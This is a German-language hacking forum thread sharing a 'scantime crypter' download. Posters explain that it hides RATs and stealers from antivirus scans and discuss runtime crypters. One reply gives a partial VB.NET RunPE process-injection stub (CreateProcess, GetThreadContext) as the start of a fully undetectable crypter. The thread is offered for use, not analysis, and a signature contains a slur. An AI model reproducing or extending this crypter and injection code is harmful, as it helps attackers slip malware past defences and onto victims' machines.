Simple Scantime Crypter v1.1 by YaHomie

    • Simple Scantime Crypter v1.1 by YaHomie

      Simple Scantime Crypter v1.1 by YaHomie


      Download:

      Der Autor hat diesen Text versteckt. Zum Einloggen oder Registrieren hier klicken.


      Wichtig: damit ihr es verwenden könnt benötigt ihr das Krypton Toolkit, hier könnt ihr es Downloaden: componentfactory.com/downloads/KryptonSuite420.zip

      Changelog:
      -Kein Icon mehr in der Taskleiste > Crypter halb so groß
      -Man kann nun nichts mehr selbst in die TextBox für den Pfad eingeben
      -Neue Stub


      MfG

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von YaHomie ()

    • Simple Scantime Crypter v1.1 by YaHomie

      HEHE.... n1 teil aber gibt ein THX :)
      [SIZE="3"]plxstar^'s Traderstuben Feedback[FONT="Book Antiqua"][/FONT][/SIZE]
      [SIZE="3"]Er ist guter Junge = 8[COLOR="Lime"][SIZE="3"][/SIZE][/COLOR][/SIZE]
      [SIZE="3"]Hmm.. geht so kann besser sein = 0[/SIZE]
      [SIZE="3"]Scheisse der Junge kann garnix = 0[/SIZE]





      [SIZE="3"]ICQ: 242-679[/SIZE]
    • Simple Scantime Crypter v1.1 by YaHomie

      Scheusal schrieb:

      Was mach ich jetzt mit Krypton und dem Crypter ?
      kurzes Tut bitte :)


      Bei Krypton selbst das brauchst du nur wegen der dll (das macht damit alles klappt wegen dem schönen design)
      dann startest du den Crypter, wählst deine File aus die du crypten willst (RAT,Stealer,...) und dann hast du eine ScanTime gcryptete File.
      Was Scantime heißt will ich nicht erklären müssen^^
      MfG
    • Simple Scantime Crypter v1.1 by YaHomie

      SuFu benutzen.
      ich kann die n np tut geben wie man den pc runterfährt und erst nochmal die bedienungsanleitung liest.
      kenn auch gute literaturtipps zum thema "Google"
      Krypton musst du installieren, das ist für das design.
      ein crypter macht deine exe fud.
      ein scantime crypter nur beim scannen, wenn die datei also noch nicht ausgeführt wurde und die malware gedroppt hat.
      runteime ist dauerhaft fud.
    • Simple Scantime Crypter v1.1 by YaHomie

      G€nius schrieb:

      Naja fürn Runtime hats dann wohl nicht gereicht xD
      Sind ja auch schwieriger zu fudden.

      btw ist der wenigsten FUD ?
      Nicht das ich mir solchen Crap ziehen würde, interessiert mich halt.


      Runtime ist schwer wenn man auf einem 64bit system arbeitet.
      finde erstmal ein richtiges runpe oder lern andre methoden für runtime. (bald gibts einen gen von mir :D)
      Bei einem runtime muss auch nur das runpe zusätzlich fud sein, falls man zum runtime ein runpe benutzt
      ist auch der einzige große unterschied.
      FUD kannste testen, Crap ist dein Post.
    • Simple Scantime Crypter v1.1 by YaHomie

      oh :(
      noch jemand der mich nicht mag :(
      dann frag nicht, sondern google.
      Falls du etwas genauer eklärt bekommen wilslt. PM me oder adde mich in ICQ: 128-884.
      oder frag hir und ich erklärs dir sogut ich kann ;)


      Alles das was du gepostet hast kann ich in 1 min auch posten stichwort GOGGLE

      danke fürs kompliment fühle mich geschmeichelt *rotwerd*
      ich bin im kopf um 50 sekunden schneller als du mit google :$

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von Sephir0th ()

    • Simple Scantime Crypter v1.1 by YaHomie

      Dank dir, aber SCantime bringts meiner meinung nach nicht wirklich :)

      Hier mal ein Anfang von einem runtime crypter. Ich kanns dir auch gerne beibringen, falls du's nicht richtig kannst, kenne dich ja noch nicht so gut :)

      Das wäre der anfang der Class1... Bin grade dabei ein FUD crypter zu coden.. also wenn dus kannst, meld dich, kannst gerne helfen :P

      Quellcode

      1. Imports System.Runtime.InteropServices
      2. Imports System.Text
      3. Public Class Class1
      4. <DllImport("kernel32")> _
      5. Private Shared Function GetThreadContext(ByVal hthr As IntPtr, ByVal katze As UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean
      6. End Function
      7. <DllImport("kernel32")> _
      8. Private Shared Function CreateProcess(ByVal appName As String, ByVal commandLine As StringBuilder, ByVal procAttr As IntPtr, ByVal thrAttr As IntPtr, <MarshalAs(UnmanagedType.Bool)> ByVal inherit As Boolean, ByVal creation As Integer, _
      9. ByVal env As IntPtr, ByVal curDir As String, ByVal sInfo As Byte(), ByVal pInfo As IntPtr()) As <MarshalAs(UnmanagedType.Bool)> Boolean
      10. End Function
      11. Public Shared Function injected(ByVal filebyte As Byte()) As Boolean 'Boolean = wahr oder falsch public shared = geteilt
      12. Dim process1 As IntPtr = IntPtr.Zero 'processattribute kann nur zahl beinhalten
      13. Dim processinfo As IntPtr() = New IntPtr(3) {} ' weißt vb dazu auf das intptr 4 felder (werte zur verfügung hat {} sagt aus das noch keine festliegen
      14. Dim startupinfo As Byte() = New Byte(67) {} ' selbe wie oben nur byte
      15. Dim number As Integer = BitConverter.ToInt32(filebyte, 60) 'integer = eine zahl von -a -b , bitconverter = 32 konverter version.
      16. Dim numeric2 As Integer = BitConverter.ToInt16(filebyte, number + 6) ' diesmal zahl kleiner
      17. If CreateProcess(Nothing, New StringBuilder(Process.GetCurrentProcess.MainModule.FileName), process1, process1, False, 4, process1, Nothing, startupinfo, processinfo) Then
      18. Dim katze As UInteger() = New UInteger(178) {}
      19. katze(0) = &H100002 ' ach jo hier is hex.
      20. End If
      21. End Function
      22. End Class
      Alles anzeigen


      Dim startupinfo As Byte() = New Byte(67) {} ' selbe wie oben nur byte
      Dim number As Integer = BitConverter.ToInt32(filebyte, 60)

      filebyte 60 "60 ist einfach gut, klappt eigtl. immer genauso wie 67. das ist einfach die größe ;)


      [SIZE="4"] -VB & C# Support[/SIZE]


      [SIZE="4"]MITGLIED DER:[/SIZE]



      [SIZE="4"]JETZT BEITRETEN! =>[/SIZE][SIZE="4"]UND AUF HURENSOHN JAGD GEHEN![/SIZE]

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von Dr.haZe ()